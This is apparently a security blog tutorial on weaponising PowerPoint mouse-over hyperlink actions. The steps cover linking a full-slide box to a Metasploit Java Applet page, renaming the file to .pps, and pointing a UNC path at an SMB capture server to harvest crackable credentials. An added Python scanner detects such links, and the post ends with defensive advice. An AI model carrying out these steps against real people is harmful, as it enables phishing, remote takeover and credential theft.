There have been all kinds of document attacks, but what about PowerPoint? It turns
out that PowerPoint makes it easy for an attacker to turn an innocent
slideshow into a nasty little attack.
The attack involves 4 simple steps: make a slideshow, make an action,
rename the file and distribute it.
First things first, you need to make a slideshow. Design it
any way you want, and pick the slide or slides you want to use the action on. Make a
new text box and drag the box to cover the whole page. Click on Insert ->
Actions -> Mouse Over. Then click the hyperlink button and select URL.
Enter the desired URL, click OK and save the PowerPoint. In figure 1 I have entered a URL that is already set up
for the Java Applet attack. This can be done with Metasploit or the Social-Engineer Toolkit.
Figure 1
If we were to send this to a target as is, it would work only
when they started the slide show. To circumvent that, we can
rename the file from a PPT to a PPS (figures 2, 3), which is a PowerPoint
Slideshow. When the file is opened it starts as a full-screen slide show. Since
our attack is launched via a mouse over, when the user attempts to close the
document the odds are they will trigger the attack.
Figure 2
Figure 3
At this point our malicious web page is opened, and the Java
Applet attack commences, as seen below.
The user may not even be aware that they triggered the
webpage to open; it might be beneficial to have the page appear to be a common
webpage such as Gmail or Facebook. If the target decides to hit Run, we would be
given our shell and complete control of the system, as shown in figure 5.
Figure 5
I wanted to see if it was possible to embed a UNC path, and it
turns out it is just as simple. Follow the same steps as outlined above, but when
you select URL, enter a UNC path such as \\ipaddress\a.gif
and set Metasploit to use the auxiliary/server/capture/smb module for
capturing your requests. As you can see from figure 6, each time the mouse
passes over the target area it sends the credentials. Now all you have to do is
crack them.
Figure 6
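Because the file carries the action in plain OOXML, a defender can triage it without opening it. The scanner below is an added example, not code from the original post: it unzips a .pptx/.ppsx, reads each slide's relationship file for external hyperlink targets, and reports every shape whose `hlinkMouseOver` or `hlinkClick` action points outside the document, flagging UNC (`\\host\share`) and `file://` targets separately because those provoke the silent SMB authentication described above. The legacy binary .ppt/.pps container is not OOXML and is out of scope here. The `build_sample_pptx` helper only constructs a minimal fixture so the scanner can be exercised offline; the host address `192.0.2.10` in it is a documentation-range placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List

# OOXML namespaces used by PresentationML slides and package relationships.
A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_REL = R_NS + "/hyperlink"


@dataclass
class Finding:
    slide: str     # zip member name, e.g. ppt/slides/slide1.xml
    trigger: str   # "mouseover" or "click"
    target: str    # external target from the slide's .rels file
    unc: bool      # True when the target would cause an SMB/WebDAV fetch


def _external_links(zf: zipfile.ZipFile, slide_name: str) -> Dict[str, str]:
    """Map relationship Id -> external hyperlink target for one slide."""
    head, _, tail = slide_name.rpartition("/")
    rels_name = f"{head}/_rels/{tail}.rels"
    links: Dict[str, str] = {}
    if rels_name not in zf.namelist():
        return links
    root = ET.fromstring(zf.read(rels_name))
    for rel in root.findall(f"{{{PKG_REL_NS}}}Relationship"):
        if rel.get("Type") == HYPERLINK_REL and rel.get("TargetMode") == "External":
            links[rel.get("Id")] = rel.get("Target", "")
    return links


def _is_unc_like(target: str) -> bool:
    t = target.strip().lower()
    return t.startswith("\\\\") or t.startswith("file://")


def scan_presentation(data: bytes) -> List[Finding]:
    """Return every external hyperlink action found on any slide."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", name):
                continue
            links = _external_links(zf, name)
            root = ET.fromstring(zf.read(name))
            for tag, trigger in ((f"{{{A_NS}}}hlinkMouseOver", "mouseover"),
                                 (f"{{{A_NS}}}hlinkClick", "click")):
                for el in root.iter(tag):
                    target = links.get(el.get(f"{{{R_NS}}}id", ""))
                    if target is None:
                        continue  # internal action (e.g. jump to slide), not a fetch
                    findings.append(Finding(name, trigger, target, _is_unc_like(target)))
    return findings


def build_sample_pptx(target: str, trigger: str = "mouseover") -> bytes:
    """Constructed test fixture: one slide with a single hyperlinked text box."""
    tag = "hlinkMouseOver" if trigger == "mouseover" else "hlinkClick"
    slide = f"""<?xml version="1.0" encoding="UTF-8"?>
<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"
       xmlns:a="{A_NS}" xmlns:r="{R_NS}">
 <p:cSld><p:spTree>
  <p:sp><p:nvSpPr><p:cNvPr id="2" name="TextBox 1"><a:{tag} r:id="rId2"/></p:cNvPr>
  <p:cNvSpPr txBox="1"/><p:nvPr/></p:nvSpPr><p:spPr/>
  <p:txBody><a:bodyPr/><a:p><a:r><a:t>Quarterly update</a:t></a:r></a:p></p:txBody>
  </p:sp>
 </p:spTree></p:cSld>
</p:sld>"""
    rels = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
 <Relationship Id="rId2" Type="{HYPERLINK_REL}" Target="{target}" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", slide)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a full-slide text box with a mouse-over UNC action.
    for f in scan_presentation(build_sample_pptx("\\\\192.0.2.10\\a.gif")):
        print(f"{f.slide}: {f.trigger} -> {f.target}  UNC={f.unc}")
```

The scanner reports clicks as well as mouse-overs because both are plain hyperlink relationships; a mail gateway or IR triage script would normally treat any mouse-over action with an external target as suspicious, since legitimate decks rarely navigate on hover, and any UNC or `file://` target as a credential-capture indicator regardless of trigger. Note that the rename from .pptx to .ppsx does not change the container, so the same scan applies to both extensions.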
These attacks are not new; the important part is that
PowerPoint does not warn the user. There is no popup asking the user if
they want to visit the site and, more importantly, there is absolutely no warning
of the attempted authentication. The user may not even know that they
have fallen victim to this attack.
This attack is very difficult to detect, as it is simply
using the features of PowerPoint for a malicious purpose. If this type of attack
originated from a spoofed trusted individual or even a disgruntled employee, it
could be absolutely devastating. My advice is simple: make sure you know the
sender. There is nothing wrong with making a phone call and saying, “Did you
send me this PowerPoint?” Also, if you notice any odd behavior after using a
PowerPoint, it may warrant further investigation.
Special thanks to my wife and @_Jagar_